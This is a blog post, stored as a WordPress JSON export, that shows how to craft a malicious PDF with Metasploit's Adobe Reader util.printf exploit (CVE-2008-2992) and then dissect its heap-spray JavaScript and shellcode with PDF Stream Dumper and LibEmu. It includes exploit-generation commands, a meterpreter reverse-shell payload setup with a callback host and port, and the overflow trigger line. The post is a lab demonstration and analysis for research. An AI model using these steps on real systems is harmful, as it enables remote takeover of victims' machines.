{"id":3330,"date":"2018-11-13T04:20:46","date_gmt":"2018-11-13T04:20:46","guid":{"rendered":"https:\/\/www.appservgrid.com\/paw92\/?p=3330"},"modified":"2018-11-17T14:05:16","modified_gmt":"2018-11-17T14:05:16","slug":"payload-in-pdf-ls-blog","status":"publish","type":"post","link":"https:\/\/www.appservgrid.com\/paw92\/index.php\/2018\/11\/13\/payload-in-pdf-ls-blog\/","title":{"rendered":"Payload in PDF \u2013 ls \/blog"},"content":{"rendered":"

Infected PDFs have always been a privileged way to infect users because this document format is very common and used by almost everyone. Moreover, it exists many ways to exploit Acrobat Reader vulnerabilities and it\u2019s very stealth and elegant way to launch a malware.<\/p>\n

In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored, and how to extract it.<\/p>\n

This article is for research purpose only, don\u2019t do bad things!<\/p>\n

PDF is object oriented format, defined by Adobe. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, \u2026). These objects are stored within the document as streams and most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, please read Adobe\u2019s specifications<\/a>.<\/p>\n

\"Capture6\"<\/a><\/p>\n

Infected PDF creation<\/h2>\n

We will create a fake PDF with metasploit<\/a>, containing an exploit attempt, as well as a custom payload (code to execute). The exploit is targeting a specific version of Adobe Reader, so we will need to make some archaeology and find an ancient Reader version (thanks to http:\/\/www.oldapps.com\/<\/a>) to install on the target machine.<\/p>\n

So, first, let\u2019s make this PDF. We will make a infected PDF that just opens calculator (calc.exe) on the machine, just for demonstration. Open a metasploit console (installation of metasploit is not covered in this article) and type:<\/p>\n\n\n\n
<\/td>\nuse exploit\/windows\/fileformat\/adobe_utilprintf<\/p>\n

set FILENAME malicious.pdf<\/p>\n

set PAYLOAD windows\/exec<\/p>\n

set CMD calc.exe<\/p>\n

show options<\/p>\n

exploit<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

It should look like this:<\/p>\n

\"Capture7\"<\/a><\/p>\n

Copy the file that has just been created (here \/home\/osboxes\/.msf4\/local\/malicious.pdf) on a shared drive. You will need to feed your target machine with it.<\/p>\n

Infected PDF execution<\/h2>\n

On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). I choose to install a 8.1.1 version<\/a>.<\/p>\n

Once installed, execute the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That\u2019s the exploit.<\/p>\n

\"Capture8\"<\/a><\/p>\n

I\u2019ve done another PDF but changed the payload slightly, just for fun:<\/p>\n\n\n\n
<\/td>\nset PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n

set LHOST 192.168.1.29<\/p>\n

set LPORT 4455<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Here\u2019s the result. Adobe Reader now has a backdoor (reverse shell) listening for commands.<\/p>\n

\"Capture9\"<\/a><\/p>\n

Infected PDF analysis<\/h2>\n

Played enough! Let\u2019s see what\u2019s inside that malicious PDF, and let\u2019s try to extract the malicious payload(we\u2019re still with the calc.exe PDF).<\/p>\n

First, we will need a tool called PDF Stream Dumper, so download it<\/a>. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.<\/p>\n

\"Capture10\"<\/a><\/p>\n

We can start by checking if some exploit is detected by the tool using the \u201cExploit Scan\u201d menu:<\/p>\n\n\n\n
<\/td>\nExploit CVE\u20132008\u20132992 Date:11.4.08 v8.1.2 \u2013 util.printf \u2013 found in stream: 6<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Indeed, there\u2019s an exploit hidden in stream 6 (the one in blue on the capture).<\/p>\n

But let\u2019s start by the beginning: when searching for exploits in a PDF, we most of the time encounter heap spray<\/a> created by a Javascript code. That heap spray is used to push the payload on the heap, ready to be executed once the vulnerability has triggered.<\/p>\n

If you open Stream 1, you can see:<\/p>\n\n\n\n
<\/td>\n\/Type\/Catalog\/Outlines 2 0 R\/Pages 3 0 R\/OpenAction 5 0 R<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

That we can translate to OpenAction on stream 5. Let\u2019s move to stream 5:<\/p>\n\n\n\n
<\/td>\n\/Type\/Action\/S\/JavaScript\/JS 6 0 R<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Which says to execute Javascript located in stream 6. This stream shows plain Javascript, it\u2019s time to open the \u201cJavascript_UI\u201d menu. We immediately recognize a big string hex encoded, and pushed into a variable for heap spray. This is our payload:<\/p>\n

\"Capture11\"<\/a><\/p>\n

Fortunately, we have tools to manipulate it, and understand what it does. Select the payload (the part between quotes), and open \u201cShellcode_analysis\u201d menu. Then choose \u201cscDbg \u2013 LibEmu Emulation\u201d. You will get a new window will the shellcode decoded into bytes (you can even save it to file):<\/p>\n

\"Capture12\"<\/a><\/p>\n

LibEmu is a library able to simulate a processor, it gives information about what the assembly code is trying to do. Just hit the \u201cLaunch\u201d button and you will understand:<\/p>\n

\"Capture13\"<\/a><\/p>\n

Here it is, we can clearly see the shellcode will just opens a calc.exe window and exits.
\nLet\u2019s redo the same analysis for the other malicious PDF (reverse shell):<\/p>\n

\"Capture14\"<\/a><\/p>\n

Uh, self explaining right? Shellcode is loading the library needed to manipulate sockets (ws2_32.dll), and tries to connect back to C&C.<\/p>\n

I haven\u2019t told about the exploit itself, it\u2019s located at the end of the javascript code (like stated by Exploit search, \u201cutil.printf \u2013 found in stream: 6\u201d). It\u2019s exploiting a buffer overflow on printf function to execute arbitrary code (here, our heap-sprayed shellcode)<\/p>\n\n\n\n
<\/td>\nutil.printf(\u201c%45000.45000f\u201d, 0);<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

I hope you enjoyed this blog post, please like, comment or share, or do all of that, it\u2019s up to you. Also, thanks for the visit \ud83d\ude09<\/p>\n

\"\"<\/p>\n

Author: tigzy<\/h4>\n

Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.<\/p>\n

Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Infected PDFs have always been a privileged way to infect users because this document format is very common and used by almost everyone. Moreover, it exists many ways to exploit Acrobat Reader vulnerabilities and it\u2019s very stealth and elegant way to launch a malware. In this article, I will show you how easy it is … <\/p>\n

Continue reading “Payload in PDF \u2013 ls \/blog”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3330","post","type-post","status-publish","format-standard","hentry","category-linux"],"_links":{"self":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts\/3330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/comments?post=3330"}],"version-history":[{"count":2,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts\/3330\/revisions"}],"predecessor-version":[{"id":3586,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts\/3330\/revisions\/3586"}],"wp:attachment":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/media?parent=3330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/categories?post=3330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/tags?post=3330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}